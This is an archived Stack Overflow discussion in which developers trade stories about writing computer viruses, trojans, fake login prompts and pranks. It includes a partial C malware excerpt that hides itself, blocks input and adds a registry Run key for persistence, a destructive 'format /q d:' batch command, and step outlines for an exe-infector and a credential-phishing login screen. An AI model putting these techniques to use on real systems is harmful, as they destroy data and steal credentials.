share
Stack OverflowHave you ever written a computer virus (or at least tried)?
[+110] [51] Vilx-
[2009-01-19 17:53:33]
[ virus ]
[ http://stackoverflow.com/questions/458507/have-you-ever-written-a-computer-virus-or-at-least-tried ] [DELETED]

The title pretty much says it all: have you ever written (or tried to write) a computer virus? I know pretty many young programmers try to do something like that in their early days. Did you? If yes, did you succeed? Tell us your tale - What did it do? Did you get punished? What did you learn from this? Etc.

(2) Why so many down votes? This seems a legitimate exercise, at least to me, in network protocol, among other things. - hmcclungiii
I don't understand it either. So many downvotes without a single comment. : \ - Megacan
Kinda like asking "Have you ever tried running through school with scissors?" - le dorfier
Well, did you learn anything from driving drunk? maybe you would like to share that an enrich us all. : ) - Megacan
(6) I think this is a perfectly valid question that can be answered appropriately. I don't see this question as "malicious". There is a lot to learn from sharing answers. - Dan Herbert
(1) I guess the best antivirus software developers need to think like virus developers. IMHO we shouldn't block this discussion. - splattne
We all did mischief while we were kids. Many of those stories are quite fun and harmless. - Vilx-
Closing this goes against the "of interest to at least one other programmer somewhere" mantra... - Sean
(1) So does closing every question then. :P No, really, if I've mad a bad question, I'll delete it myself. I thought people would find this fun. - Vilx-
Why would you worry about -4 downvotes and 1 offensive? You've gotten at least +30 upvotes, 8 favorites and 500 views. Don't let 4 naysayers get you down. - Simucal
That was 3 hours ago. I'll remove that sentence. :) - Vilx-
I find it very interesting that all affirmative answerers did so for 'non-malicious' or 'educational' purposes. I wonder where the writers of those annoying and malicious viruses hang out. Certainly not on StackOverFlow. - anon
I had a 'friend' shall we say, that wrote a harmless virus that spread over the entire campus, 250+ computers were infected. In the end this 'friend' wrote an anti-virus to clean the said PC's..... - Darknight
There is a clear distinction between writing a virus, and releasing one. Anyone competent enough to write a good one would have the ability to release it only among machines he either owned or was legitimately allowed access to by the owner. - Tom W
[+70] [2009-01-19 19:01:59] TheXenocide

I got into a lot of trouble in High School for writing a few things, the biggest and most notorious of which resembled the Novelle Netware login prompt our school used. It looked identical and when a user typed in their username and password it would save them to the current users network folder, display a message box with a standard error we saw every now and then (which of course ended with "Please try again. If the problem persists contact a System Administrator.") and then launched the real login, which worked (logging the current user off and the new user on). The program was actually a prank on a friend of ours, but the program spread around and then someone was stupid enough to try to set it up on an administrator, which then prompted a search and ultimately lead to people pointing fingers.

Ultimately, I found the exercise itself rather fun since the network was secured very well we couldn't run untrusted code; ultimately we found the loophole was to enable running macros in word and then use VBA to get the job done. I also learned pretty quickly the repercussions of tampering with government property as the charges they brought against us were massive and plentiful (felonies, federal charges, the works). Ultimately there was no malicious intent and no grades were altered or secure systems affected, so the charges were viewed as excessive, but I still had to tour the local jail and put up some community service on top of being suspended for a week.

Afterward I became president of computer club and started helping the admins by finding loopholes and reporting them, which turned ultimately allowed me more research opportunities and leeway so long as the results were properly reported. I think of this turn of events as incredibly influential in my learning and would not change any of it even if I could.


Amen. We should learn from our experiences, rather than regret them. - e.James
What school was this? - roe
(7) PS: Do you get extra rep every time you use the word "ultimately" in your answer? ; ) - e.James
(2) eJames, Yes, ultimately you do, per se. - Greg
Federal charges? Awful. - bigmattyh
(8) ... Wow. I SWEAR that me and my friend pulled this EXACT SAME stunt back in the day. We used VB to replicate the Novell login screen, and we left it running as us. As soon as someone from the next period tried logging in, it'd save their information in our drive and log us off. Wow, small world. - Paolo Bergantino
All we did was change their desktop backgrounds and leave them txt files in their drives with funny messages, and we never got caught. Funny to see someone else did the same thing, though. I thought it was so unique. :( - Paolo Bergantino
... Wow again!. I did exactly the same, but I used MSDOS batch files instead. - Daniel Rikowski
(6) I believe this would fall more into the 'phishing application' category rather than the virus category. - Jough
I also wrote a Netware password grabber in high school, but as soon as I got the admin password, I printed out my program and wrote the password on it, and gave it to my teacher. I then convinced them to let me admin the school network (since I was on site every day!). - Jay Bazuzi
We did the same thing too! Wild. We got a bit of a slap on the wrist when the CS teacher figured it out but we weren't messing with grades. - Echostorm
OMG, I did exactly that. The old Novell Netware 5.1 prompt for DOS. - tsilb
@Jough: I suppose it's true that it's more of a phishing app than a virus, but at the time there was no differentiation (since phishing wasn't really commonplace yet, though it seems plenty of others had the same idea, lol). Just the same, a keylogger is a man-in-the-middle attack of sorts. @eJames: Ultimately, it would seem I did ;p - TheXenocide
+1 - I did that same thing! - alex
We did this on a BBC. - John
I did this and had to go see the head! hhahaha - mcintyre321
We did that too at my school, but only for a laugh, and it was just a simple batch file, nothing self-replicating. - biziclop
1
[+29] [2009-01-19 19:44:43] John MacIntyre

I thought about it when I was in school, but decided if something went wrong (like a bug), it could get out of control, and real damage could be done.

Basically, I decided it was not worth the risk. Also, destroying things isn't really as difficult as building them, so I decided to focus only on building value.

I'm sure you can learn a lot writing a virus, but you can learn just as much writing something constructive. (no judgement)


(5) +1 for "destroying isn't as difficult as building". However, preventing destruction can be pretty hard too. - Bill the Lizard
(2) "preventing destruction can be pretty hard too" ... even harder, I'd say. But I'm not interested in the security end of things, so it wasn't something I felt I should spend time on. - John MacIntyre
+1 for being politically correct .. although not fun!! hehe - hasen j
Saying It's easier to destroy than build is like saying the A-bomb was not a massive scientific achievement. - John
2
[+22] [2009-01-19 18:22:15] Cruachan

Yes, but only for personal interest and to learn how they worked.

When viruses first became known in the early/mid 80's I wrote a simple virus on DOS in 286 assembler that copied itself into the header of .exe files so it was executed when the file was run. It then scanned the computer for more uninfected .exe files and repeated the copy. The first version was destructive - overwriting the header so the program no longer worked, the second not as it moved the uninfected code to the file end, replacing it with the infection code and executing it after the virus code. I did this using a book on security that went it a lot of detail on actual code and a simple manual on basic 286 assembler - being well before the Internet.

Incidentally I did all this on an Atari ST running a DOS emulator so it was completely isolated from any real environment - an early virtual machine - as I had a healthy paranoia about letting it near anything valuable.

I never did anything with it beyond experimenting - no payload or such, but it was definitely a worthwhile exercise as it taught me more about 286 assembler and low-level DOS program organisation - like how a program actually loads itself into memory and starts executing - than I would have ever encountered elsewhere, and of course there was a certain interest in playing with something then quite new and 'hackish'.


3
[+21] [2009-01-19 22:27:20] Gerard

Yes, and some damn good ones. However There is a BIG difference between writing a 'virus' and deploying it into the wild. Many viruses are created in labs to better prepare future developments against malicious intent. Many security firms employ just such an approach.

I have created several malicious viruses designed to aggressively take networks down and deployed them in controlled environments. We found this an essential exercise to improve both our development efforts and Network security. And yes, if you're curious, we did initially deploy them secretly within the environment in order to test the IT response to such threats.

Sometimes, when it really matters you need to test the theories and redundancies with as much realism as possible.


How successful were your virusues in in your environment? - Nikron
Some were highly effective in demonstrating flaws in Network protocols and Server stacks. Also, testing how to propagate to other machines was 'fun' to watch happen. We learnt some interesting techniques for our own software. - Gerard
4
[+12] [2009-01-19 18:39:55] Gamecat is Toon Krijthe

I did once wrote a program that (not intentionally) cleared my hard drive. Does that count ;-).


(2) No it doesn't. A virus is a program that replicates itself. - dreamlax
(10) Haha - I did this too in my early days - I wrote a Blackjack playing game to learn about using pointers. After I wiped my hard drive I figured I'd learnt enough about pointers :) - Chris Latta
5
[+10] [2009-01-19 20:02:41] Bill the Lizard

No, but I was asked to. My boss gave me requirements for a program that would start when a user inserted a floppy disk with the program on it, search on the user's network for a computer with one of our attached devices, then update the device driver. This was to be done automagically, without the user needing to know what was going on. After I explained to him (and his boss, and his boss) that this was virus-like activity, and that there was an entire industry devoted to preventing it, I was finally able to get the requirements changed to something more reasonable.

It would have been interesting to try it, just to see how many nuclear power plants (our target customers for those instruments) had security relaxed enough to make it work. At the time I was guessing around 0.


"automagically"... lol! If that wasn't intentional, you may have just coined a new phrase (which I think I'm going to have to start using). - gnovice
Never mind... I just googled it and got almost 5 million hits. Still funny though (it's new to me)! - gnovice
(3) I normally use it to mean a requirement that a user wants, but they have no idea what kind of spell I'd have to cast to make it work. :) - Bill the Lizard
(1) @Bill: SO your a lizard and a wizard? A lizwiz if you will. - Lucas
For some reason, reading this sent images of Homer Simpson to my mind. - MAK
6
[+5] [2009-01-19 19:18:45] dicroce

There used to be something called the "Virus Creation Labs". Essentially, it was a code generator. You would select what features you wanted in your virus and it would generate an assembly file that had those features.

When I generated the virus, I had no way of knowing if the assembly really did what it claimed, (I didn't know assembly then, this was l2 years ago) but I did have an assembler and linker!

So I assembled it and linked it. Then I had an EXE.

I ran it.

It corrupted my fat. To this day, I have friends that won't let me live that moment down.


Oh, VCL... how could I have forgotten thee. :) Those were the days... - Lusid
(1) I must admit-- I performed a similar misstep with VCL. Needless to say, I subsequently learned how to reinstall an operating system. ;) - crftr
7
[+5] [2009-01-20 03:38:29] devstuff

I've never written one, but I've disassembled quite a few to find signatures for a now-defunct anti-virus product.

Some of the early "virus toolkits" were very well done, written by people with excellent knowledge of the x86 processors, but without thinking about the consequences. Luckily a number of the "in the wild" viruses had bugs or no payload, and could be removed easily.

The company had to perform numerous repair jobs on corrupted drives to get back someone's thesis, accounting data, etc., including training about regular backups :-). A number of people still lost years of work when there was too much data corruption -- heartbreaking stuff.

So if you have the knowledge to write one you'd really be better off coming up with the next Google instead...


8
[+5] [2009-02-16 11:14:21] Paul Dixon

Animal Magic

I made an app which played the theme tune to Animal Magic at 5pm every Friday, and installed it on as many company PCs as I could before leaving the company.

Not so much a virus, as it could spread itself, more a prank :)

You see, every Friday our team would play the theme tune to Animal Magic (a kids TV show from the 70s, google it, the theme tune is excellent). While playing, all involved had to glide around on their chairs in time to the music.

I guess you had to be there.

Anyway, when I left the company, I wanted to be sure the magic lived on, hence the little app which did its best to stay hidden until the desired time.

I hear it took them a few months to completely eradicate it.


9
[+4] [2009-01-19 21:58:23] Peter Štibraný

I wrote four simple viruses back in DOS age. It taught me some assembler, some .exe format details, DOS API, something about resident programs, how to hide my virus in the exe file, etc. One virus was interesting as it xor-ed its body with file where it was hiding, so it looked totally different each time (except small loader ;-)). All-in-all, it was fun and I was very proud of these viruses (I was like 15 after all :-)), although they were quite stupid, and I think NOD was able to detect all of them via its heuristic.


10
[+4] [2009-01-19 23:14:16] GvS

In highschool I've done some research on how computer virusses work. I've written one to demonstrate to the rest of the class how easy it was to create a virus.

This virus was written in Turbo Pascal, and was only capable of "infecting" other Turbo Pascal source files. This made it more visible.

Later when I found out that MSN messenger had an API in 15 minutes I hacked something together (in VB6) that could use MSN to spread. To my surprise this really worked. The user had to click a link, but everyone did.

I included a maximum work time (for about 15 minutes) and MSN was not that well known back then, but this was a dangerous experiment.


+1 I had the same idea back in high school to infect Turbo Pascal source files. Never realized because it is toooo obvious. I wanted to do: 1.get all PAS files on hard drive 2.add some code before the main END. What was your idea? - Peter Gfader
This was "just" a demonstration virus. Infecting one pascal source at a time. It added a comment in the file, to indicate it was infected. The details I have lost. But the project succeeded, showing how easy you could create a virus. - GvS
11
[+4] [2009-01-19 23:22:13] BlackTigerX

1996, at work, I had created some fancy app using a combination of .bat files, pkzip/unzip utilities and some of my own creations with Turbo Pascal running on a Novell Network. Another guy came and used all my code, made a couple minimal changes (like the directories used or something like that) and put HIS name on the ".bat app"

I was so pissed of, I created a new .bat, called it "echo .bat", with a #255 character in the name

that .bat file deleted his programs every time it was executed

all I had to do was to add some "echo " on one of his .bat files

oh, it was so much fun... til they found out


and then you got fired? - Sam Meldrum
lol, no, I didn't get fired, we just had to settle our differences, I was the programmer, he was stealing my work - BlackTigerX
(1) stealing your work, within the company? - John
@John yep, blatant plagiarism - BlackTigerX
12
[+3] [2009-01-19 18:31:52] Dan Herbert

I've thought about virus writing. My issue would be how to test them. I could set up a network of virtual machines to test it, however it becomes very complicated. The way I see it, a malicious virus has two properties to it:

  • It can cause damage to a machine when executed
  • It can self-propagate in some way (whether automatically, or through social engineering (convincing someone to do something that will send it to others))

I think both aspects are simple enough to create. The challenge is to create them together in a way that is testable, yet not malicious to machines other than your virtual test network.

I think the biggest implication is what it means for security. I feel like everyone should learn how to write viruses or some sort of malicious code at some point, just to learn the thought process it takes. The better one knows how to do this, the better off you are at protecting against it. This applies for really any kind of development at any level (almost). Both installable apps, and web apps can be open to vulnerabilities, and any layer within a technology stack is open to attack if not properly secured.

Knowing how to cause damage is one of the best ways to prevent it. I think it's better than just being told how to prevent it because actively thinking about how to attack a system means you're more likely to remember it.


(1) xkcd.com/350, gotta love xkcd - Samuel
That's what I was thinking of. - Dan Herbert
(2) "not malicious to machines other than your virtual test network" Simple: unplug the cable to the physical network, treat the test machine (and its VMs) as write-only. - Piskvor
@Samuel: now i want to do that.... ;) - RCIX
@Samuel: Yeah...that...actually is pretty cool. Gives the viruses a life-like personna. - Mark
13
[+3] [2009-01-19 21:56:22] Konrad Rudolph

I regret never having done this. Building a good virus might teach a lot. Back when the virus was still active, I got the source code of the PhatBot worm kit. That was one impressive piece of software. One of the best, cleanest OSS projects I've ever seen, including one of the best documentations. From a technical point of view, this code really was a marvel.

Someone else pointed out the considerable logistical challenge of testing a virus. This makes development obviously much harder if you're not one of the two people on earth who are capable of writing correct code every time, without ever testing (the other one is Don Knuth, of course).

For someone less interested in the nitty-gritty low-level system exploitation techniques and more in the “biological” component of viruses, there are good alternatives, e.g. CoreWars [1] just to name one of them.

[1] http://en.wikipedia.org/wiki/Core_War

Ooh, looks like a fun game. How active is the community? - Wallacoloo
14
[+3] [2009-02-03 07:28:28] Mike B

Whilst this isn't strictly a virus I had once written a tool that installed itself on a computer once a certain command was passed (login on Novell NetWare) and replicated a spying tool that teachers used to see what students were up to on their computers. The original system allowed them to view a students' screen and send them messages, usually saying "Stop looking at Games" or "Get back to Work!". Mine was a simple messaging system that displayed a message that looked exactly the same as the real one, expect mine was controlled by the number of the PC, not the users' login credentials. After a quick walk-around to see what number PC they were on (they were printed on the monitors) I sent them a couple of disturbing messages, ranging from:

Mr A Teacher To Mr B Student

So...What you doin' tonight? ;-)

To this delightful one when the Headmaster was playing on a Computer in the Lab and the Teacher was obviously slacking.

Headmaster to Mr A Teacher

I don't pay you to sit around giggling like an infant. Get back to work before I kick your ass out of here!

That got me into trouble, even though they never found out that it was me that had written the program.


(2) Um, that's pretty creepy... - RCIX
15
[+3] [2010-06-17 07:28:06] Mark

It wasn't exactly a "virus" but it had some negative side-effects. I was always weeks ahead of the rest of the class in my high school programming class, so the teacher would think up some ridiculous projects for me to do. I don't know if she exactly employed me to do this one, or if it was my own idea, but people were always playing games in class when they weren't supposed to.

So I wrote a program to stop this behavior. Basically, it just scanned the titlebar of all running apps and killed them if they contained certain keywords. Then I got a little carried away and made it so the program always ran two copies of itself, so that if you tried to ctrl-alt-del kill it, another one would just respawn. I had to install the program manually on all the computers in the lab.

I then made it read a text file off a network drive that contained all the keywords I wanted to kill. But... this was no fun, I couldn't see who I was actually stopping. So I started logging everything that people were doing. I then discovered that I was killing some perfectly legitimate programs!! For example, in photoshop and 3ds max, when you save a file, the filename appears in the title. If you saved your file had the word "game" or one of my other magical key words, it would just die, and every time you tried opening it, it would die again. Oops.

It had some humorous affects too, when it actually did work. AddictingGames.com was really popular among my class mates. I'd see someone go to site... it would close, they'd scratch their heads and think WTH? Then they'd try again...and again...and again, and have no idea what was going on! It was funny when you heard perplexed noises throughout the class room.

There was a real jerk in our class too. He was screwing around with the bios of these computers and other stuff he shouldn't really be doing. Plus, I didn't really like the kid. So I added his username as one of the keywords... every time he tried viewing his network drive in explorer it would close. He then tried going to a different computer... one which I had also installed the program. Sucker :)

I shut it down before the teachers actually caught on to the havoc I was wrecking... I didn't think they'd be too pleased, even if my intentions were noble to begin with. I was more or less a teacher's pet though, so... they wouldn't have cared too much.

Programmed in C++ I think.


16
[+2] [2009-01-19 20:07:41] Belliez

TheXenocide, I actually did the exact same Novell trick... programmed a replica login screen screen using dos based Pascal! Going back a bit! Even Had the right time delays between entering a username, password and reporting an error with the password entered to make it look authentic!

The program would be executed by the autoexec.bat on start up just before Novell kicked in with the real login screen (black screen with a red bar at the top if I remember right!).

It saved all the usernames and passwords to the hard disk... I then logged in as another user and sent a network message to everyone from users account! (nothing malicous off course). The sys admin did come into the computer block one day after I sent several messages to everyone and looked at the empty computer that I was using 5 mins earlier (I moved to opposite side of the room just in time).

Good days! My last (and only) computer virus even if it was a bit basic!


+1 we did the same back in highschool - Peter Gfader
17
[+2] [2009-01-19 23:19:52] Martin Woodward

The closest I ever got was to write a program that executed from the bootsector of a BBC Model B Microcomputer [1] that were popular in UK schools at the time. It made the screen go different colors along with the text "You've been noobled" or something really dumb while playing a stupid tune that I can still remember but defies words to describe how lame it was.

The program was unable to replicate itself and didn't do anything harmful other than stop me from going outside or learning to talk to girls so I guess it was pretty benign. I learnt a lot about assembly and hacking around with hex editors that I've forgotten now but I'm pretty sure it did teach me something at the time other than what an interesting graphics architecture the BBC had (and a nice keyboard)

As it never caused any damage, I never got into trouble for it. In fact for one class we were left with a substitute teacher and the instructions "See Martin for any questions". Looking back I am not sure if this was the teacher making a comment on the level of ineptitude in the subject of his co-workers or a snide remark at how much I liked to talk about the subject during class. I suspect the former as the substitute teacher in question usually taught pottery and appeared to be grateful when I was able to answer my classmates problems while she read a book.

[1] http://en.wikipedia.org/wiki/BBC_Micro

18
[+2] [2010-07-09 09:42:25] Neurofluxation

Yep, I created a Cvirus that basically bound itself to the registry each boot and created an exe named: ╚a.exe

It would then append the exe files with the sentance (over and over): ThisWontMakeYouLaughInFactYouWillProbablyGetReallyAnnoyedNeverMindEh\n

It's good fun.

EXTRACT FROM THE CODE BELOW, THIS IS NOT THE FULL SOURCE CODE SO DON'T FLAME ME! (AND IT WON'T COMPILE - SO DON'T TRY)*

int APIENTRY WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    //  Cloak
    HWND wnd=FindWindow("ConsoleWindowClass",NULL);
    ShowWindow(wnd,SW_HIDE);

    //  "What use is a phonecall if you are unable to speak...?"
    BlockInput(true);

    //  Wake up Neo. The matrix has you...
    windir[MAX_PATH];
    currentfile[MAX_PATH];
    HMODULE Me=GetModuleHandle(NULL);
    GetModuleFileName(Me, currentfile, sizeof(currentfile));
    GetWindowsDirectory(windir, sizeof(windir));
    strcat(windir, "\\system32\\sysbackup.exe");
    CopyFile(currentfile, windir, false);
    HKEY hkey;
    RegCreateKey (HKEY_LOCAL_MACHINE, "\\Moomins\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", &hkey);
    RegSetValueEx (hkey, "Microsoft CrapWare", 0, REG_SZ, (LPBYTE)windir, sizeof(windir));

    //  Inevitability
    ofstream file;
    file.open("╚a.exe");

    while(1)
    {
        //  Append the contents of the file you made, as this:
        file<<"ThisWontMakeYouLaughInFactYouWillProbablyGetReallyAnnoyedNeverMindEh\n";
    }
    return 0;
} 

19
[+1] [2009-01-19 19:33:59] bugfixr

I have not personally written a virus...

To those of you who do it for learning experience, good for you.

To those of you who do it to be malicious, what a huge waste of programming talent. I spent enough time cleaning up virus up my neighbors and parents, brothers, etc., that it bothers me to no end to see how good programmers waste their talents away writting virus, spyware, etc.


20
[+1] [2009-01-19 19:52:14] gatorfax

I think it helps to understand security vulnerabilities by experimenting with code that takes advantage of them. For example, it is trivial to write a program that takes advantage of a buffer overflow to change the return address of a function. However, such exercises can be done without resorting to writing actual viruses.

In the end, the goal should be for us software developers to learn from the mistakes of the past and not repeat them.


21
[+1] [2009-01-19 21:45:53] J.J.

When I was younger I made a go at writing a hidden txt file that would fill up the C: drive.

My first attempt taught me that Windows XP will automatically compress a text file that has repetitive text. Kinda neat. Multi Gig sized file was compressed down to a couple of megs.


Remember though, a virus is a program that replicates itself. - dreamlax
22
[+1] [2009-01-19 22:54:59] Noaki

Closest I've pulled was an application that spawned a few dozens instances of various pre-installed windows games (winmine, solitare, etc) to cover up the fact it was generating 10,000 empty text files on the desktop.

I stuck the code inside of a class project that my professor decided to demo to the class. It got a good laugh (he laughed hardest at it).


23
[+1] [2009-01-20 10:12:26] Paul

Back in my days at school I wrote a program which copied itself around the network, and then during my classes scheduled would randomly play funny wave files or open and close CD-rom drives at random.

But then I grew up.


24
[+1] [2009-02-09 13:47:42] bobince

Two. You'll probably find most people with a hand in anti-malware have written viral code at some point. Obviously I've never released them as I'm not a sociopath, but I can't say that about everyone's...

Both were for RISC OS, an obscure OS for UK firm Acorn's ground-breaking but ultimately doomed desktop platform (for which the ARM chip was originally developed). Most RISC OS viruses were annoying but harmless and pretty basic things; the leading anti-virus package was a wobbly lump of compiled BASIC whose performance was terrible, and which couldn't actually be run on Acorn's smaller-memory machines as new definitions pushed its memory footprint into (what was in those days) the stratosphere.

The first was little more than a joke, a BASIC virus that infected other BASIC desktop programs by looking for their WIMP loop and hacking extra procedure calls into the source. Incredibly slow and amazing it even worked.

The second, on the other hand, was potentially pretty serious. It infected any Module files (which are a bit like .DLLs) that the system ever accessed, adding code to the end of the file and redirecting the entry points. When loaded, it would claim all the operating system's file-handling vectors so that anything that tried to read the infected files (including the OS itself loading them, and the aforementioned anti-virus tool) would see the original uninfected file. In this sense it was rather like the file-hiding stuff today's rootkits.

It was virulent and stealthy enough to escape its own testing environment a few times during development, so it was lucky I included a kill-switch; could have been very unpleasant in the wild. The payload was that it searched every file you accessed for a sequence of plain ASCII letters that would execute arbitrary code encoded (similarly to base 64) between the ASCII header and a checksum terminator. This would allow payloads to be hidden in innocuous-looking e-mails or other content from the net or a floppy disc.

Compared to the Russian crap we have to put up with today, though, it all seems rather quaint...


25
[+1] [2009-03-15 02:51:20] tardate

Viruses were just starting coming to prominence when I was at uni, and with a group of friends we'd collect and share as many samples as we could get our hands on.

The main interest was to pull them apart and understand how they operated at the lowest level. The first (and probably last) I remember really getting to the stage of knowing how it all worked end-to-end was the classic Brain [1] virus.

Really, this was all about tinkering with our machines at the lowest level - that place where software, hardware and BIOS meet. Examining viruses was in fact just a small but interesting part of that whole discovery process that got me down and dirty with things like

  • master boot records and disk layouts for floppy and hard disks
  • hardware and software interrupts
  • DOS internals: bootstrapping, file system, memory management, interrupt handling
  • and even just good techniques for disassembly and reverse engineering

But the question was: did I write any viruses? Not that I recall. What more interested me was applying many of the same techniques in programs that didn't self-replicate and wouldn't class as viruses - like TSRs (terminate, stay-resident), some disk surface analysis utilities and so on. Then later on, working with some autonomous agent methods on the web.

Pretty much all the specific technicalities are now obsolete, but the lessons learned and the knowledge gained were invaluable and still help today.

The playing field has now shifted somewhat - I suspect moved up from that hardware/BIOS/os interface and now the virus attack surfaces are more likely to be in higher software layers or networking stacks. But I think it is still the case that a responsible interest in virus technology is a great course of study for anyone who is driven to understand 'how it all works'.

In a sense, to do so is to challenge and tame the ghost in the machine.

[1] http://en.wikipedia.org/wiki/Brain%5F%28computer%5Fvirus%29

26
[+1] [2009-03-15 03:00:52] Vasil

I've written trojans and worms in Delphi when I was in high school. My most notorious creation was a server process that remained hidden on the system and allowed me to get screenshots, show message boxes, restart machines, steal passwords etc by sending commands to it. I used to go by female names on IRC on channels with horny guys and give around the executable masked as a jpg picture (example: ana.jpg.exe). Being on irc I could easily find the ip address of the poor bastards that tried to view the "picture".

This was before windows xp.

Those were my first contacts with TCP/IP programming.


27
[+1] [2009-04-26 04:09:51] Peter Gfader

I created a simple virus back in high school in Turbo Pascal, slowed down machines DRAMATICALLY, but earned some reputation points from school mates :-)

  1. Get all .exe files in current directory (only first 100 .exe files, else too slow)
  2. Open single .exe and see if first 1000 bytes contain my magic virus string
  3. If yes skip, If not
    a Create temp.exe file b copy virus to that file
    c copy original file to that file
    d Delete original .exe file
    e Rename temp.exe to original .exe file
  4. Execute original .exe file via
    a copy end of current.exe file to new file
    b run that new file

To start infection I had to give my friends an awesome new game with an install.bat that launches the virus first time :-)

I killed my own machines 1 time with that virus, no virtual machines at that time :-)


I did succeed, 5 school mates had an infected machine, over 3 years. No punishment :-) I learned a lot of things: DOS and Windows Internals, Execution of applications, bit of assembler code, integration of assembler code into Pascal... - Peter Gfader
28
[+1] [2010-06-17 07:07:39] Zeeshan Umar

I have created few virus when i was in school or in collage. But they were too lazy and never created a threat for any one. Virus which i created displays a message box after random time and says hello i am a very dangerous virus. apart from that it does nothing.

In the mean time a famous I love you virus was released. After I realized that there is no use of creating things which can possibly harm someone. So after that I never thought of writing virus and since then I am doing creative stuff not virus stuff.


29
[0] [2009-01-19 17:55:58] Megacan

I though about it several times, I even started to plan something. But I never got around to actually try it.

I think you can learn some cool stuff programming viruses.


30
[0] [2009-01-19 18:14:51] Jakob Cosoroaba

I made a Registry Writing app, which changed IE6 setting to always open getfirefox.com ,.. and disabling the homepage settings and regedit not sure if you can consider that a virus, used it on 2 friends more as a prank, so they finally moved away from ie.


I'd stick with the definition of virus involving its copying itself ... - A. Rex
That's not a virus, that's you forcing your beliefs on your friends. - Samuel
Thats messed up man, it's a browser not a religion. - Echostorm
You've got my support. Virus noted and considered. - ImGreg
31
[0] [2009-01-19 18:15:29] Jader Dias

No. I've never written.

I think that we must support the development of computer viruses for research and educational purposes with deployment limited to a controlled environment if it's really necessary to achieve advances in the security technology.


IIRC that's how a few of the bigger viruses made it into the wild, an accidental deployment from a closed network. I do agree with you in principle, but wonder if the fallout could be worse from such actions... - tekiegreg
32
[0] [2009-01-19 21:31:54] E.J. Brennan

I know a guy that was trying to win a contract against another vendor - both came in to do a demo to the client, back to back, when vendor "A" was demo-ing their product, vendor "B" had a 'virus' on his machine that kept disconnecting vendor 'A's machine from the corporate network and causing his application to crash - he only made it happen about 5 times during the 30 minute demo, but it made the speaker break his stride repeatedly, and continue on all flustered and red-faced.

Vendor "B" got the contract.


That is really cruel! - Wallacoloo
33
[0] [2009-01-19 21:39:33] Joe Philllips

After learning HTML and some simple scripting, I moved on to mIRC scripting where I made a script that connected many bots (on the same IP) to the server to flood users. I think I called it PapaFlo0d (named after the PapaSmurf DoS script). It was fairly successful at disconnecting users and I learned a lot about socket programming, loops, etc. The script was even copied/borrowed by some people who extended it. That made me feel kind of good that I was able to accomplish something that other people wanted to use, even if it was malicious.


34
[0] [2009-01-19 21:41:11] user933

I tried writing a very simple Outlook virus a number of years ago. It was done with a VBS attachment to an email, and it scanned the user's Contacts and automatically sent a copy of itself including the VBS attachment to those users if you ran the VBS. It didn't do anything malicious, just copy itself (notwithstanding the potential for network clogging with potentially exponentially-increasing numbers of emails). Just a proof of concept.

I was quite careful though and had it so that only I ever got emailed, not arbitrary users. It worked for me, and definitely would have worked in the wild, and that was neat enough. It never got sent to anyone else so I didn't get caught/punished or anything like that.

I wouldn't have a clue of how to write a real virus that modified .exe files.


35
[0] [2009-01-19 22:13:01] Black Cat

Nothing serious - just SysCall redirection without modifying the SysCall table.


36
[0] [2009-01-20 03:14:14] William

I did create one, and the only one so far, virus on my beloved Apple ][e clone for fun around 20 years ago using the LISA assembler :P It spreads itself by writing to the boot sector of Apple DOS 3.3 floppy disk and triggers the speaker by hooking into a zero page vector (forgot which), and its only effect is to trigger the speaker for some sound when some Applesoft BASIC programs are running.


37
[0] [2009-01-20 09:19:35] Kivin

About ten years, ago, in my junior year of high school, some of my peers and I used Visual Basic to write a series of applications. These ranged from harmless gags to seriously impacting the productivity of the labs. I think the most notable instance was a rather flashy program which looked nasty but did nothing of consequence which nearly gave some old chap a heart attack in the senior citizens "Intro to Computing" course. It didn't take very long for my prof to figure out who was behind them, but he was more disappointed than upset. I never received any disciplinary action as a result of it.


38
[0] [2009-01-20 10:16:42] Skuta

I've coded simple thing: The replacement for winword.exe which launched word and even after quitting the microsoft word, the application set the timer to be randomly chosen - 2 - 4 hours, and turned off computer. It was supposed to be revenge but I've never used it :)


39
[0] [2009-01-20 12:15:56] Chaosteil

Just once. I was working on a trojan to infect my friends with, just for the fun of it. After working on it for a few hours I somehow managed to get it on a friends computer, where it sat happily hidden between the system files. Unfortunately, I was never able to connect to the box the trojan sat at, but a few tests with other friends proved that it was working just fine. Oh well.

After a few years I was looking through my old archives and found a somehow familiar executable. When I tried to launch it, it instantly hid between my files. I never made a removal tool, so I had to read through the code to find where it has itself placed.

This whole writing of the trojan got me a really good insight about the Windows architecture and registry processing, and even though I am not completely sure the trojan is disabled on my (old) box, it was still a fun experience.


40
[0] [2009-01-20 12:29:45] Ahmed Said

echo y | format /q d:

This is the command I wrote in .bat file from 6 years to format the machine. Actually I did not try to harm someone but I made this when I was learning batch file commands :)


41
[0] [2009-01-21 10:42:49] Gerhard

In high school I wanted to write a virus but how do you start? I recently got a assembly programming book so I had some idea about assembly code. I ask people for examples and checked out the code using hiew (Hacker view Hex Editor). I based mine on the sunday virus [1]. I worked from dos bootdisks to prevent my pc from becoming infected. It was simple but worked. It promptly infected my PC when I accidentally inserted a floppy containing my virus. I had to delete a lot of files to get rid of the virus. After my accident I steered clear of viruses.

[1] http://en.wikipedia.org/wiki/Sunday_(computer_virus)

42
[0] [2009-02-09 12:45:51] jeong

Yeap I tried mine then I was middle school student.
that virus(actually a hidden batch file) is for deleting all files in computer.

yes.... I executed that virus at my computer by myself...


43
[0] [2010-06-04 01:12:33] uosɐſ

I randomly POKEd by first love, my Apple IIe because I read it could lead to permanent damage. Yup.

No idea what it did or whether it was recoverable, I was pretty new at the time.


44
[0] [2010-06-04 01:16:13] uosɐſ

I made an trojan of sorts masquerading as a IRC patch thing that I sent to a friend. Put an autoexec.bat in his c root that said "This call cannot be completed as dialed. Please insert twenty-five cents." at boot, over and over.

I told him right away, but he was kinda pissed at me.


45
[0] [2010-08-24 20:06:57] JuanZe

Yes, back in the mid-90's, in a world where XT/286/386 computers rules. I learnt a lot about interruptions, DOS and assembler programming. It was a curiosity driven activity. My two virus actually works but I never deploy it to the world. One of them was called Maradona and not only replicated itself but also portrays a Diego Maradona [1]'s national soccer team t-shirt (the one with number 10) when activated on Maradona's birthday (October 30th)...

My research literature was "The Little Black Book of Computer Viruses" (by Mark A. Ludwig), some other books and "Virus Report", an argentine magazine about virus, hacking, and cyberpunk stuff.

[1] http://en.wikipedia.org/wiki/Diego_Maradona

46
[0] [2010-11-02 19:43:10] Nico

